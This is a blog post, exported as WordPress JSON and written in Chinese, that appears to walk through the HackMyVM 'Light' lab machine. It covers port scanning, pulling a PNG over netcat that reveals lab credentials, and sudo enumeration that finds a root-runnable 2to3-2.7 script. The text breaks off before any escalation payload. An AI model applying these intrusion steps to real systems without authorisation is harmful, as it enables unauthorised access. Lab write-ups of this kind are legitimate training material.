{"id":917,"date":"2025-06-27T15:06:11","date_gmt":"2025-06-27T07:06:11","guid":{"rendered":"http:\/\/162.14.82.114\/?p=917"},"modified":"2025-06-27T15:06:11","modified_gmt":"2025-06-27T07:06:11","slug":"hmv-_-light","status":"publish","type":"post","link":"http:\/\/162.14.82.114\/index.php\/917\/06\/27\/2025\/","title":{"rendered":"hmv[-_-]Light"},"content":{"rendered":"<h1>Light<\/h1>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202506271505449.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202506271505449.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20250626073738460\" style=\"zoom:50%;\" \/><\/div><br \/>\n<div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202506271505450.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202506271505450.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20250627132201414\" style=\"zoom:50%;\" \/><\/div><\/p>\n<h2>\u4fe1\u606f\u641c\u96c6<\/h2>\n<h3>\u7aef\u53e3\u626b\u63cf<\/h3>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(kali\u327fkali)-[~\/temp\/Light]\n\u2514\u2500$ rustscan -a $IP -- -sCV\n.----. .-. .-. .----..---.  .----. .---.   .--.  .-. .-.\n| {}  }| { } |{ {__ {_   _}{ {__  \/  ___} \/ {} \\ |  `| |\n| .-. \\| {_} |.-._} } | |  .-._} }\\     }\/  \/\\  \\| |\\  |\n`-&#039; `-&#039;`-----&#039;`----&#039;  `-&#039;  `----&#039;  `---&#039; `-&#039;  `-&#039;`-&#039; `-&#039;\nThe Modern Day Port Scanner.\n________________________________________\n: http:\/\/discord.skerritt.blog         :\n: https:\/\/github.com\/RustScan\/RustScan :\n --------------------------------------\n\ud83c\udf0dHACK THE PLANET\ud83c\udf0d\n\n[~] The config file is expected to be at &quot;\/home\/kali\/.rustscan.toml&quot;\n[!] File limit is lower than default batch size. Consider upping with --ulimit. May cause harm to sensitive servers\n[!] Your file limit is very small, which negatively impacts RustScan&#039;s speed. Use the Docker image, or up the Ulimit with &#039;--ulimit 5000&#039;. \nOpen 192.168.10.101:22\nPORT      STATE  SERVICE REASON         VERSION\n22\/tcp    open   ssh     syn-ack ttl 64 OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)\n| ssh-hostkey: \n|   2048 93:a4:92:55:72:2b:9b:4a:52:66:5c:af:a9:83:3c:fd (RSA)\n| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDKpc4iyFhIzxDvlJoPvgE9rRlFPOqHm4EkLgqXQkVf31csyjpvJgyZpTgr4gYV3oztsMmQbIj+nFGD+L5pQfaSXtAdxKpqt4D\/MnFqVKP6KKGFhATWMCDzGXRaXQyaF7dOq49vkIoptczAU2af2PfwycA3aaI\/lNPOYSHPRufkm102lE\/lHZzNbXh0yJJXy9RJaqELeAibmqdrHFNpXFT8qAvsQrz\/6IKJkia4JLdVbfeMdZBOQ9lIlQg+2VfKXp7pF7kGZKKttIThc8ROqlcOaxlmuC5oKEgFQP7obty1+6fx\/QIuNn3D05FeQMqbvJfFZF1dE2IH4WEbFWRGH6w1\n|   256 1e:a7:44:0b:2c:1b:0d:77:83:df:1d:9f:0e:30:08:4d (ECDSA)\n| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBAYupwIuJVRtRMDrYZ6fR\/3p5E5vsqXADwGAoZ2RW5vKPxDV3j\/+QjGbnRDj1iD5\/iwZxxlUggSr5raZfzAHrZA=\n|   256 d0:fa:9d:76:77:42:6f:91:d3:bd:b5:44:72:a7:c9:71 (ED25519)\n|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIAOshh8VG4l9hWlVYWfAvLuWuwPEdiF8EXmm5BFib\/+q\n58132\/tcp closed unknown reset ttl 64\nMAC Address: 08:00:27:07:5C:9B (PCS Systemtechnik\/Oracle VirtualBox virtual NIC)\nService Info: OS: Linux; CPE: cpe:\/o:linux:linux_kernel<\/code><\/pre>\n<p>\u626b\u63cf\u4e00\u4e0budp\uff1a<\/p>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(kali\u327fkali)-[~\/temp\/Light]\n\u2514\u2500$ sudo nmap -sU  --top-ports 100 $IP \nStarting Nmap 7.95 ( https:\/\/nmap.org ) at 2025-06-27 01:31 EDT\nNmap scan report for 192.168.10.101\nHost is up (0.00082s latency).\nNot shown: 99 closed udp ports (port-unreach)\nPORT   STATE         SERVICE\n68\/udp open|filtered dhcpc\nMAC Address: 08:00:27:07:5C:9B (PCS Systemtechnik\/Oracle VirtualBox virtual NIC)\n\nNmap done: 1 IP address (1 host up) scanned in 139.07 seconds<\/code><\/pre>\n<h2>\u6f0f\u6d1e\u53d1\u73b0<\/h2>\n<h3>\u654f\u611f\u7aef\u53e3<\/h3>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(kali\u327fkali)-[~\/temp\/Light]\n\u2514\u2500$ nc $IP 58132                          \n(UNKNOWN) [192.168.10.101] 58132 (?) : Connection refused<\/code><\/pre>\n<p>\u91cd\u65b0\u626b\u63cf\uff1a<\/p>\n<pre><code class=\"language-bash\">Open 192.168.10.101:22\nOpen 192.168.10.101:11071\nOpen 192.168.10.101:45691\nOpen 192.168.10.101:59838<\/code><\/pre>\n<p>\u518d\u626b\u4e00\u6b21\uff1a<\/p>\n<pre><code class=\"language-bash\">Open 192.168.10.101:22\nOpen 192.168.10.101:33654<\/code><\/pre>\n<p>\u3002\u3002\u3002\u3002\u3002\u3002<\/p>\n<pre><code class=\"language-bash\">PORT      STATE SERVICE\n22\/tcp    open  ssh\n33591\/tcp open  unknown<\/code><\/pre>\n<p>\u770b\u4e00\u4e0b\u5565\u60c5\u51b5\u3002\u3002\u3002\u3002\u3002<\/p>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(kali\u327fkali)-[~\/temp\/Light]\n\u2514\u2500$ nc $IP 33591       \n00000000: 8950 4e47 0d0a 1a0a 0000 000d 4948 4452  .PNG........IHDR\n00000010: 0000 013f 0000 0085 0806 0000 002d 80ff  ...?.........-..\n00000020: 0c00 0000 0173 5247 4200 aece 1ce9 0000  .....sRGB.......\n00000030: 0004 6741 4d41 0000 b18f 0bfc 6105 0000  ..gAMA......a...\n00000040: 0009 7048 5973 0000 0ec3 0000 0ec3 01c7  ..pHYs..........\n00000050: 6fa8 6400 0007 de49 4441 5478 5eed dbf7  o.d....IDATx^...\n00000060: 9314 4518 c671 ffff 1f2d ab2c 73c0 9cb0  ..E..q...-.,s...\n00000070: 0c08 7292 0491 2092 8380 08e2 09ca c1a1  ..r... .........\n00000080: 2248 7aed c799 2ea7 a67a 6f7b c3ed edf2  &quot;Hz......zo{....\n00000090: 7c3f 5553 1c7d bdd3 d361 9f09 bbf7 5400  |?US.}...a....T.\n000000a0: 8021 c20f 8025 c20f 8025 c20f 8025 c20f  .!...%...%...%..\n000000b0: 8025 c20f 8025 c20f 8025 c20f 8025 c20f  .%...%...%...%..\n000000c0: 8025 c20f 8025 c20f 8025 c20f 8025 c20f  .%...%...%...%..\n000000d0: 8025 c20f 8025 c20f 8025 c20f 8025 c20f  .%...%...%...%..\n000000e0: 8025 c20f 8025 c20f 8025 c20f 8025 c20f  .%...%...%...%..\n000000f0: 8025 c20f 8025 c20f 8025 c20f 8025 c20f  .%...%...%...%..\n00000100: 8025 c20f 8025 c20f 8025 c20f 8025 c20f  .%...%...%...%..\n00000110: 8025 c20f 8025 c20f 8025 c20f 8025 c20f  .%...%...%...%..\n00000120: 8025 c20f 8025 c20f 8025 c20f 8025 c20f  .%...%...%...%..\n00000130: 8025 c20f 8025 c20f 8025 c20f 8025 c20f  .%...%...%...%..\n00000140: 8025 c20f 8025 c20f 8025 c20f 8025 c20f  .%...%...%...%..\n00000150: 8025 c20f 8025 c20f 8025 c20f 8025 c20f  .%...%...%...%..\n00000160: 8025 c20f 8025 c20f 8025 c20f 8025 c20f  .%...%...%...%..\n00000170: 8025 c20f 8025 c20f 8025 c20f 8025 c20f  .%...%...%...%..\n00000180: 8025 c20f 8025 c20f 80a5 c50c bf07 0f23  .%...%.........#\n00000190: eede 8fb8 d76e fa59 654f 82dc b7bf ff69  .....n.YeO.....i\n000001a0: 0b30 538f 1fa7 f14f 63af 4d3f 976c d41c  .0S....Oc.M?.l..\n000001b0: cda2 5da3 f5b7 98e1 77e4 c788 67b7 45bc  ..].....w...g.E.\n000001c0: f855 c49b 5f47 bcba 33e2 f8e5 f697 0b4e  .U.._G..3......N\n000001d0: fd50 7f5e 586a 0b30 5337 ff8a 7869 47b3  .P.^Xj.0S7..xiG.\n000001e0: e9e7 928d 9aa3 59b4 6bb4 fe16 ffb6 f78d  ......Y.k.......\n000001f0: 3d11 efec 8b38 73b5 2d58 703f 2c47 bcbd  =....8s.-Xp?,G..\n00000200: 37bd f952 b063 f6ee dc8b 782b 9d50 b5e9  7..R.c....x+.P..\n00000210: e712 ad35 adb9 4d69 edcd d22c dad5 fadb  ...5..Mi...,....\n00000220: 88be 6d80 c50f 3f4d d25a e1a7 4bf8 5da7  ..m...?M.Z..K.].\n00000230: 2276 9ffe 7f3b d6bb 4abc f27b c49e 54be  &quot;v...;..J..{..T.\n00000240: e364 5b90 94ca 64dc fd5d 5d29 efaf 4b67  .d[...d..]])..Kg\n00000250: dd2d 4722 bef8 3ee2 da6a 5b98 cce2 f826  .-G&quot;..&gt;..j[....&amp;\n00000260: d99f fc79 3762 e9f8 daf5 721b fbce ae5d  ...y7b....r....]\n00000270: 4f4a ed6a fbf2 585b a155 7b7c 35f5 2ea7  OJ.j..X[.U{|5...\n00000280: e3d3 fedf dfdf 6c1a 0b1d afea 76db cd21  ......l.....v..!\n00000290: f4de 3711 7b3b 7d19 b75d a9e9 ef28 edd6  ..7.{;}..]...(..\n000002a0: cc87 74db fdfa 4cb3 f63e 487d ef87 5f4d  ..t...L..&gt;H}.._M\n000002b0: 3f06 ada1 bfd2 4944 afd5 a69f e7c4 931d  ?.....ID........\n000002c0: 7eab 779a 4079 6d57 73ab 7cf8 62c4 b6a3  ~.w.@ymWs.|.b...\n000002d0: 119f 1c8e b874 bdad 949c baf2 ffed 7356  .....t........sV\n000002e0: 2a1b 777f cbb7 9a45 a1b2 97d3 edd4 205f  *.w....E...... _\n000002f0: a6c5 aa2b 8ea5 136d 416b bd8f 4f6a f7b7  ...+...mAk..Oj..\n00000300: 35bd 393e 3e14 71f1 5a5b a9a5 aba4 6fce  5.9&gt;&gt;.q.Z[....o.\n00000310: 451c bc30 bc5d f571 ade3 ebb7 ab7d e64d  E..0.].q.....}.M\n00000320: 6ffa acb6 bfb5 f596 6f36 f3a4 70d1 a690  o.......o6..p...\n00000330: 3e54 6837 87d0 bba9 ce34 daad ed6f 6dbb  &gt;Th7.....4...om.\n00000340: 5233 1fa5 e353 602a f8bb e157 db8f fe1a  R3...S`*...W....\n00000350: ba72 a379 eded bf23 5edf dd6c b706 3c4a  .r.y...#^..l..&lt;J\n00000360: d800 4f76 f89d 4c93 a1db e2ee 44fe f04b  ..Ov..L.....D..K\n00000370: 7b5b d909 a1bc a8ba f54a 65a3 ee4f 0b41  {[.......Je..O.A\n00000380: be4a 67c2 8f0f 467c f65d 7356 2d79 f828  .Jg...F|.]sV-y.(\n00000390: 627b 5a78 1f7e 9bce c09d 052f eb75 7ce3  b{Zx.~.....\/.u|.\n000003a0: ec4f a1b7 f940 1360 6ba9 6db7 54af d46e  .O...@.`k.m.T..n\n000003b0: 496d 7f6b eb89 ae4c f26d efa0 ab94 49fa  Im.k...L.m....I.\n000003c0: 3149 7f6b db2d 19e5 f86a d641 697f fde3  1I.k.-...j.Ai...\n000003d0: fb34 adf7 9329 34bb 8f12 1486 73e2 c90e  .4...)4.....s...\n000003e0: bfd2 6299 76d9 f95f 07d7 fbe8 40c4 335b  ..b.v.._....@.3[\n000003f0: 23fe 4867 be61 f480 f9ad b498 ce2f b705  #.Hg.a.......\/..\n00000400: 1dd3 3ee6 49ca 6aad 352e c3ca 8eff d45c  ..&gt;.I.j.5......\\\n00000410: 650c 6bb7 f4da da76 4bf5 446f ce61 6fd4  e.k....vK.Do.ao.\n00000420: da7e d4b6 3b49 7f4b 6525 93cc c7b8 655f  .~..;I.Ke%....e_\n00000430: a4ab c333 3f13 7eeb 4603 ad01 d7c0 f74d  ...3?.~.F......M\n00000440: 7322 2597 e9ea 4c13 996f e114 5add 0f28  s&quot;%...L..o..Z..(\n00000450: 723d 9d2d 6ba9 1d6d 27d2 99b2 6f1a c73c  r=.-k..m&#039;...o..&lt;\n00000460: adb2 4174 95a4 f1c8 9b6e cd34 4ee3 b6a1  ..At.....n.4N...\n00000470: 4f5a 5f49 b74f dd71 d615 7457 7e6d ed7c  OZ_I.O.q..tW~m.|\n00000480: 0cab 27eb 117e 35ed 8ed2 df9a f19b e67c  ..&#039;..~5........|\n00000490: 8c5b 46f8 ad33 0db4 065c 03df 573b 69f9  .[F..3...\\..W;i.\n000004a0: 5945 b7ec 5c7b 59af 0599 e5d7 aa7c e5cf  YE..\\{Y......|..\n000004b0: e619 d1af b79a edea 4a5b 2929 b531 8816  ........J[)).1..\n000004c0: a91e 34ab 7d9d 9db5 50fa 6afb 318b b292  ..4.}...P.j.1...\n000004d0: 9f6f a437 ea89 a69e c6e5 b7db 1107 cf37  .o.7...........7\n000004e0: cfcd c66d 43df 37d3 986a 8cb5 bf03 697f  ...mC.7..j....i.\n000004f0: ba92 de7d aaad 90e4 d7d6 cec7 b07a b21e  ...}.........z..\n00000500: e157 d3ee 28fd 1dd6 eeb4 e7a3 b6ac ff3e  .W..(..........&gt;\n00000510: fafc 48aa 97c2 efde 8366 3c79 e637 651a  ..H......f&lt;y.7e.\n00000520: 684d 8226 a3ef 741a 782d bcd2 a469 22b2  hM.&amp;..t.x-...i&quot;.\n00000530: 6b69 31ea e1f6 a654 a605 a84f fdf6 a640  ki1....T...O...@\n00000540: da7c b079 e09d 95f6 5752 5a18 83e8 0da6  .|.y....WRZ.....\n00000550: 7675 9538 e8f6 b8b6 1fd3 a8d7 2d2b d5d3  vu.8........-+..\n00000560: e2bd 9042 fa6c 3a39 647a 2654 3a79 f4f7  ...B.l:9dz&amp;T:y..\n00000570: 576a a376 acf2 c9a8 fb81 51ed 7cd4 d693  Wj.v......Q.|...\n00000580: 5b69 3e34 177a b3ea 417d 496d 3f46 69b7  [i&gt;4.z..A}Im?Fi.\n00000590: afd4 dfda 766b e763 9275 90eb 95de 471a  ....vk.c.u....G.\n000005a0: bf5f 5288 1f4d b7f3 6753 bdd3 69d3 f1e8  ._R..M..gS..i...\n000005b0: c392 3bf3 f3e5 e9c5 0cbf ffbe 85de 0ea2  ..;.............\n000005c0: 0655 97f4 ba5d d487 06dd 6fa6 eb3b 4b0a  .U...]....o..;K.\n000005d0: b07c fba9 dfab 9ece 80ba 05e8 d2a4 e843  .|.............C\n000005e0: 092d 7a4d b43e 98d8 77ae fd65 abbf bffc  .-zM.&gt;..w..e....\n000005f0: d725 fab7 abb4 804a 1e3d 8eb8 beda f441  .%.....J.=.....A\n00000600: 6daf 0e78 b3d5 f663 d27a 1ac7 ee31 97ea  m..x...c.z...1..\n00000610: 1dbd d4fc 5f63 94d5 eeaf f6cd 9be7 37ff  ...._c........7.\n00000620: 054f 6d3f 06cd 476d 3dd1 1c68 2e34 27d7  .Om?..Gm=..h.4&#039;.\n00000630: d315 d3fd 74d5 a27a dd75 55db 8fda 766b  ....t..z.uU...vk\n00000640: fb3b 6ebb a3cc ef28 f54a efa3 fc81 913e  .;n....(.J.....&gt;\n00000650: f155 5f14 ba7a 5d77 7f73 6231 c34f 6790  .U_..z]w.sb1.Og.\n00000660: fc17 1e1a 586d 1a6c fdff e92d 6da5 9626  ....Xm.l...-m..&amp;\n00000670: 43cf 57f4 3b6d fa74 4acf 2206 797e a9b9  C.W.;m.tJ.&quot;.y~..\n00000680: d5d5 d9ae a4bf bfe7 b637 0ba3 4b0f b0b5  .........7..K...\n00000690: 0fed 6b2d fafa 80ce 9c35 0ba3 dbae ae14  ..k-.....5......\n000006a0: 153e 3b3a b744 596d 7ffb f534 7e1a c7fe  .&gt;;:.DYm...4~...\n000006b0: 314f 737f a571 2995 75e7 77d4 764b f321  1Os..q).u.w.vK.!\n000006c0: b5f5 321d 8fae ba72 fdee baaa ed87 d4b4  ..2....r........\n000006d0: 5bdb df49 daad 9ddf 49d7 c14a ba33 503d  [..I....I..J.3P=\n000006e0: 6d7f dc6d 6e85 4bc7 3707 16ff b677 91e9  m..mn.K.7....w..\n000006f0: eca9 f0d3 4219 c5ce 147a ba32 292d 3e00  ....B....z.2)-&gt;.\n00000700: 5508 bf8d a46f e1eb 01b7 9e33 d6d2 37eb  U....o.....3..7.\n00000710: f525 d4fd e996 7c8e 1e1e 038b 86f0 9b77  .%....|........w\n00000720: fae4 4e9f 025f b8d6 7c63 5eb7 10fa d6bf  ..N.._..|c^.....\n00000730: 9e15 0218 1be1 37ef f477 927a a8ac bfaa  ......7..w.z....\n00000740: d0a6 af3f ccd1 2766 c0a2 22fc 0058 22fc  ...?..&#039;f..&quot;..X&quot;.\n00000750: 0058 22fc 0058 22fc 0058 22fc 0058 22fc  .X&quot;..X&quot;..X&quot;..X&quot;.\n00000760: 0058 22fc 0058 22fc 0058 22fc 0058 22fc  .X&quot;..X&quot;..X&quot;..X&quot;.\n00000770: 0058 22fc 0058 22fc 0058 22fc 0058 22fc  .X&quot;..X&quot;..X&quot;..X&quot;.\n00000780: 0058 22fc 0058 22fc 0058 22fc 0058 22fc  .X&quot;..X&quot;..X&quot;..X&quot;.\n00000790: 0058 22fc 0058 22fc 0058 22fc 0058 22fc  .X&quot;..X&quot;..X&quot;..X&quot;.\n000007a0: 0058 22fc 0058 22fc 0058 22fc 0058 22fc  .X&quot;..X&quot;..X&quot;..X&quot;.\n000007b0: 0058 22fc 0058 22fc 0058 22fc 0058 22fc  .X&quot;..X&quot;..X&quot;..X&quot;.\n000007c0: 0058 22fc 0058 22fc 0058 22fc 0058 22fc  .X&quot;..X&quot;..X&quot;..X&quot;.\n000007d0: 0058 22fc 0058 22fc 0058 22fc 0058 22fc  .X&quot;..X&quot;..X&quot;..X&quot;.\n000007e0: 0058 22fc 0058 22fc 0058 22fc 0058 22fc  .X&quot;..X&quot;..X&quot;..X&quot;.\n000007f0: 0058 22fc 0058 22fc 0058 22fc 0058 22fc  .X&quot;..X&quot;..X&quot;..X&quot;.\n00000800: 0058 22fc 0058 22fc 0058 22fc 0058 22fc  .X&quot;..X&quot;..X&quot;..X&quot;.\n00000810: 0058 22fc 0058 22fc 0058 22fc 0058 22fc  .X&quot;..X&quot;..X&quot;..X&quot;.\n00000820: 0058 22fc 0058 22fc 0058 22fc 0058 22fc  .X&quot;..X&quot;..X&quot;..X&quot;.\n00000830: 0018 8af8 1765 703a 66dc e967 bc00 0000  .....ep:f..g....\n00000840: 0049 454e 44ae 4260 82                   .IEND.B`.<\/code><\/pre>\n<p>\u6709\u4e00\u4e2a<code>.png<\/code>\u6587\u4ef6\u3002\u3002\u3002\u3002\u3002\u5c1d\u8bd5\u4e0b\u8f7d\u7684\u65f6\u5019\uff1a<\/p>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(kali\u327fkali)-[~\/temp\/Light]\n\u2514\u2500$ nc $IP 33591 &gt; temp.png\n(UNKNOWN) [192.168.10.101] 33591 (?) : Connection refused<\/code><\/pre>\n<p>\u53c8\u53d8\u4e86\u5457\u3002\u3002\u3002\u3002<\/p>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(kali\u327fkali)-[~\/temp\/Light]\n\u2514\u2500$ nmap $IP -p 1-65535    \nStarting Nmap 7.95 ( https:\/\/nmap.org ) at 2025-06-27 01:48 EDT\nNmap scan report for 192.168.10.101\nHost is up (0.00047s latency).\nNot shown: 65533 closed tcp ports (reset)\nPORT      STATE SERVICE\n22\/tcp    open  ssh\n12493\/tcp open  unknown\nMAC Address: 08:00:27:07:5C:9B (PCS Systemtechnik\/Oracle VirtualBox virtual NIC)\n\nNmap done: 1 IP address (1 host up) scanned in 5.62 seconds\n\n\u250c\u2500\u2500(kali\u327fkali)-[~\/temp\/Light]\n\u2514\u2500$ nc $IP 12493 &gt; temp.png<\/code><\/pre>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202506271505452.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202506271505452.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20250627135139141\" style=\"zoom:50%;\" \/><\/div><\/p>\n<p>\u62ff\u5230\u51ed\u8bc1<code>lover:youcanseetheshadow<\/code>\uff1a<\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202506271505453.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202506271505453.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20250627135258950\" style=\"zoom: 33%;\" \/><\/div><\/p>\n<h2>\u63d0\u6743<\/h2>\n<h3>\u4fe1\u606f\u641c\u96c6<\/h3>\n<pre><code class=\"language-bash\">lover@light:~$ sudo -l\nMatching Defaults entries for lover on light:\n    env_reset, mail_badpass, secure_path=\/usr\/local\/sbin\\:\/usr\/local\/bin\\:\/usr\/sbin\\:\/usr\/bin\\:\/sbin\\:\/bin\n\nUser lover may run the following commands on light:\n    (ALL : ALL) NOPASSWD: \/usr\/bin\/2to3-2.7\n\nlover@light:~$ ls -la \/usr\/bin\/2to3-2.7\n-rwxr-xr-x 1 root root 96 Oct 10  2019 \/usr\/bin\/2to3-2.7\n\nlover@light:~$ file \/usr\/bin\/2to3-2.7\n\/usr\/bin\/2to3-2.7: a \/usr\/bin\/python2.7 script, ASCII text executable\n\nlover@light:~$ cat \/usr\/bin\/2to3-2.7\n#! \/usr\/bin\/python2.7\nimport sys\nfrom lib2to3.main import main\n\nsys.exit(main(&quot;lib2to3.fixes&quot;))\nlover@light:~$ find \/ -name &quot;*lib2to3.main*&quot; 2&gt;\/dev\/null\nlover@light:~$ find \/ -name &quot;*lib2to3*&quot; 2&gt;\/dev\/null\n\/usr\/lib\/python2.7\/lib2to3\n\nlover@light:~$ ls -la \/usr\/lib\/python2.7\/lib2to3\ntotal 304\ndrwxr-xr-x  4 root root  4096 Nov 13  2020 .\ndrwxr-xr-x 26 root root 16384 Nov 13  2020 ..\n-rw-r--r--  1 root root  6834 Oct 10  2019 btm_matcher.py\n-rw-r--r--  1 root root  5808 Nov 13  2020 btm_matcher.pyc\n-rw-r--r--  1 root root 10012 Oct 10  2019 btm_utils.py\n-rw-r--r--  1 root root  7537 Nov 13  2020 btm_utils.pyc\n-rw-r--r--  1 root root  6780 Oct 10  2019 fixer_base.py\n-rw-r--r--  1 root root  7154 Nov 13  2020 fixer_base.pyc\n-rw-r--r--  1 root root 14597 Oct 10  2019 fixer_util.py\n-rw-r--r--  1 root root 14615 Nov 13  2020 fixer_util.pyc\ndrwxr-xr-x  2 root root  4096 Nov 13  2020 fixes\n-rw-r--r--  1 root root  7094 Oct 10  2019 Grammar.txt\n-rw-r--r--  1 root root     7 Oct 10  2019 __init__.py\n-rw-r--r--  1 root root   125 Nov 13  2020 __init__.pyc\n-rw-r--r--  1 root root    67 Oct 10  2019 __main__.py\n-rw-r--r--  1 root root 11605 Oct 10  2019 main.py\n-rw-r--r--  1 root root   240 Nov 13  2020 __main__.pyc\n-rw-r--r--  1 root root  9811 Nov 13  2020 main.pyc\n-rw-r--r--  1 root root  7065 Oct 10  2019 patcomp.py\n-rw-r--r--  1 root root  6577 Nov 13  2020 patcomp.pyc\n-rw-r--r--  1 root root   793 Oct 10  2019 PatternGrammar.txt\ndrwxr-xr-x  2 root root  4096 Nov 13  2020 pgen2\n-rw-r--r--  1 root root  1158 Oct 10  2019 pygram.py\n-rw-r--r--  1 root root  1435 Nov 13  2020 pygram.pyc\n-rw-r--r--  1 root root 29039 Oct 10  2019 pytree.py\n-rw-r--r--  1 root root 30151 Nov 13  2020 pytree.pyc\n-rw-r--r--  1 root root 28067 Oct 10  2019 refactor.py\n-rw-r--r--  1 root root 23874 Nov 13  2020 refactor.pyc\n\nlover@light:~$ \/usr\/bin\/2to3-2.7 --help\nUsage: 2to3 [options] file|dir ...\n\nOptions:\n  -h, --help            show this help message and exit\n  -d, --doctests_only   Fix up doctests only\n  -f FIX, --fix=FIX     Each FIX specifies a transformation; default: all\n  -j PROCESSES, --processes=PROCESSES\n                        Run 2to3 concurrently\n  -x NOFIX, --nofix=NOFIX\n                        Prevent a transformation from being run\n  -l, --list-fixes      List available transformations\n  -p, --print-function  Modify the grammar so that print() is a function\n  -v, --verbose         More verbose logging\n  --no-diffs            Don&#039;t show diffs of the refactoring\n  -w, --write           Write back modified files\n  -n, --nobackups       Don&#039;t write backups for modified files\n  -o OUTPUT_DIR, --output-dir=OUTPUT_DIR\n                        Put output files in this directory instead of\n                        overwriting the input files.  Requires -n.\n  -W, --write-unchanged-files\n                        Also write files even if no changes were required\n                        (useful with --output-dir); implies -w.\n  --add-suffix=ADD_SUFFIX\n                        Append this string to all output filenames. Requires\n                        -n if non-empty.  ex: --add-suffix=&#039;3&#039; will generate\n                        .py3 files.\n\nlover@light:~$ ls -la\ntotal 52\ndrwxr-xr-x 3 lover lover 4096 Nov 13  2020 .\ndrwxr-xr-x 3 root  root  4096 Nov 13  2020 ..\n-rw-r--r-- 1 lover lover  220 Nov 13  2020 .bash_logout\n-rw-r--r-- 1 lover lover 3526 Nov 13  2020 .bashrc\n-rwxr-xr-x 1 lover lover 1921 Nov 13  2020 flag.sh\ndrwxr-xr-x 3 lover lover 4096 Nov 13  2020 .local\n-rw-r--r-- 1 lover lover 9037 Nov 13  2020 mypass.txt\n-rw-r--r-- 1 lover lover  807 Nov 13  2020 .profile\n-rwxr-xr-x 1 lover lover  660 Nov 13  2020 tip.py\n-rw------- 1 lover lover   17 Nov 13  2020 user.txt\n-rw------- 1 lover lover   51 Nov 13  2020 .Xauthority\n\nlover@light:~$ cat flag.sh \n#!\/bin\/bash\necho &#039;\\033[0;35m\n                                   .     **                                     \n                                *           *.                                  \n                                              ,*                                \n                                                 *,                             \n                         ,                         ,*                           \n                      .,                              *,                        \n                    \/                                    *                      \n                 ,*                                        *,                   \n               \/.                                            .*.                \n             *                                                  **              \n             ,*                                               ,*                \n                **                                          *.                  \n                   **                                    **.                    \n                     ,*                                **                       \n                        